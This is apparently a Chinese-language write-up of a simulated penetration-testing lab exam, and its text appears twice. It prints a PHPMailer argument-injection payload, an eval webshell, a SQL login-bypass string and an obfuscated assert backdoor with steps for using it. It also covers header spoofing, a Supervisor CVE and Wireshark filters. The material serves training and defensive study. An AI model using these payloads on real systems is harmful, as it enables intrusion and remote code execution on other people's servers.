记一次360众测仿真实战靶场考核WP
字数 1467 2025-08-25 22:58:41

360众测仿真实战靶场考核技术解析

1. 微信User-Agent头伪造

技术要点

  • 伪造微信客户端的User-Agent头可以绕过某些针对微信环境的检测
  • 典型微信User-Agent格式:
User-Agent: Mozilla/5.0 (iPhone; CPU iPhoneOS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G

实战应用

  • 使用Burp Suite等工具修改请求头
  • 适用于需要伪装成微信客户端访问的场景

2. PHPMailer远程命令执行漏洞

漏洞原理

  • PHPMailer在处理邮件发送时存在参数注入漏洞
  • 通过精心构造的email参数可实现任意文件写入

利用方法

  1. 构造恶意email参数:
"xxx". -OQueueDirectory=/tmp/. -X/var/www/html/xxxx.php @xxx.com
  1. 在message参数中写入PHP代码:
<?php @eval($_GET[a]);?>
  1. 访问生成的webshell文件执行任意代码

防御措施

  • 升级至最新版PHPMailer
  • 对用户输入进行严格过滤

3. 登录框SQL盲注

技术要点

  • 传统时间盲注效率低下
  • 万能密码可快速绕过登录验证

实战经验

  • 优先尝试万能密码如:admin' or '1'='1
  • 避免耗时的时间盲注方法
  • 注意密码字段可能存在的特殊处理(如MD5加密)

4. Supervisor远程命令执行漏洞(CVE-2017-11610)

漏洞信息

  • 影响Supervisor的XML-RPC接口
  • 允许未经认证的远程代码执行

利用方法

  • 使用公开EXP直接利用
  • 参考链接:https://blog.51cto.com/eth10/1955450

防御措施

  • 升级Supervisor至安全版本
  • 限制XML-RPC接口访问

5. Referer来源伪造

技术要点

  • 通过修改HTTP Referer头伪造请求来源
  • 常用于绕过CSRF防护或来源检查

实战应用

  • 使用Burp Suite修改Referer头
  • 匹配目标系统要求的特定Referer值

6. 简单代码审计与利用

漏洞代码分析

<?php
    if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87')    {
        $_=@fopen('t.php', 'a');
        @fwrite($_,"<?php \$_=str_replace('ilo','ass',str_replace('vey','ert',\$_GET[2]));
        @\$_(\$_POST[1]);?>");
        @fclose($_);
         }
?>

利用步骤

  1. 访问URL带参数:?1=GET.fPZ87 生成t.php
  2. 访问t.php时构造参数:?2=ilovey
  3. POST提交PHP代码:1=php代码

技术原理

  • 通过双重str_replace将"ilovey"转换为"assert"
  • 最终形成可执行代码:assert($_POST[1])

7. PHPCMS v9.1.x漏洞

注意事项

  • 前台可能存在漏洞利用点
  • 后台登录可能依赖二维码验证
  • 需进一步研究前台RCE或其他漏洞

8. 加解密程序分析

技术短板

  • 需要反编译技能分析EXE文件
  • 涉及加密算法逆向分析
  • 建议学习工具:IDA Pro、Ghidra等

9-10. Wireshark数据包分析技巧

高效分析方法

  1. 搜索关键字符串如"php"定位可疑文件上传
  2. 分析上传后的恶意行为
  3. 定位攻击者IP:
    • 筛选POST请求
    • 从第一个POST请求开始追踪
    • 使用过滤器:php || post || html

实用过滤技巧

  • http.request.method == "POST"
  • frame contains "php"
  • ip.src == x.x.x.x

总结与经验

  1. 灵活应变:避免陷入耗时的方法(如时间盲注),寻找更高效方案
  2. 知识广度:熟悉常见漏洞利用方式(如PHPMailer、Supervisor)
  3. 工具熟练:掌握Burp Suite、Wireshark等工具的高级用法
  4. 心态管理:保持冷静,遇到困难时尝试不同思路
  5. 持续学习:弥补技术短板(如反编译技能)

建议学习路径

  1. 掌握常见Web漏洞原理
  2. 熟练使用安全测试工具
  3. 学习代码审计基础
  4. 了解二进制逆向基础
  5. 参与更多实战靶场练习
360众测仿真实战靶场考核技术解析 1. 微信User-Agent头伪造 技术要点 : 伪造微信客户端的User-Agent头可以绕过某些针对微信环境的检测 典型微信User-Agent格式: 实战应用 : 使用Burp Suite等工具修改请求头 适用于需要伪装成微信客户端访问的场景 2. PHPMailer远程命令执行漏洞 漏洞原理 : PHPMailer在处理邮件发送时存在参数注入漏洞 通过精心构造的email参数可实现任意文件写入 利用方法 : 构造恶意email参数: 在message参数中写入PHP代码: 访问生成的webshell文件执行任意代码 防御措施 : 升级至最新版PHPMailer 对用户输入进行严格过滤 3. 登录框SQL盲注 技术要点 : 传统时间盲注效率低下 万能密码可快速绕过登录验证 实战经验 : 优先尝试万能密码如: admin' or '1'='1 避免耗时的时间盲注方法 注意密码字段可能存在的特殊处理(如MD5加密) 4. Supervisor远程命令执行漏洞(CVE-2017-11610) 漏洞信息 : 影响Supervisor的XML-RPC接口 允许未经认证的远程代码执行 利用方法 : 使用公开EXP直接利用 参考链接:https://blog.51cto.com/eth10/1955450 防御措施 : 升级Supervisor至安全版本 限制XML-RPC接口访问 5. Referer来源伪造 技术要点 : 通过修改HTTP Referer头伪造请求来源 常用于绕过CSRF防护或来源检查 实战应用 : 使用Burp Suite修改Referer头 匹配目标系统要求的特定Referer值 6. 简单代码审计与利用 漏洞代码分析 : 利用步骤 : 访问URL带参数: ?1=GET.fPZ87 生成t.php 访问t.php时构造参数: ?2=ilovey POST提交PHP代码: 1=php代码 技术原理 : 通过双重str_ replace将"ilovey"转换为"assert" 最终形成可执行代码: assert($_POST[1]) 7. PHPCMS v9.1.x漏洞 注意事项 : 前台可能存在漏洞利用点 后台登录可能依赖二维码验证 需进一步研究前台RCE或其他漏洞 8. 加解密程序分析 技术短板 : 需要反编译技能分析EXE文件 涉及加密算法逆向分析 建议学习工具:IDA Pro、Ghidra等 9-10. Wireshark数据包分析技巧 高效分析方法 : 搜索关键字符串如"php"定位可疑文件上传 分析上传后的恶意行为 定位攻击者IP: 筛选POST请求 从第一个POST请求开始追踪 使用过滤器: php || post || html 实用过滤技巧 : http.request.method == "POST" frame contains "php" ip.src == x.x.x.x 总结与经验 灵活应变 :避免陷入耗时的方法(如时间盲注),寻找更高效方案 知识广度 :熟悉常见漏洞利用方式(如PHPMailer、Supervisor) 工具熟练 :掌握Burp Suite、Wireshark等工具的高级用法 心态管理 :保持冷静,遇到困难时尝试不同思路 持续学习 :弥补技术短板(如反编译技能) 建议学习路径 : 掌握常见Web漏洞原理 熟练使用安全测试工具 学习代码审计基础 了解二进制逆向基础 参与更多实战靶场练习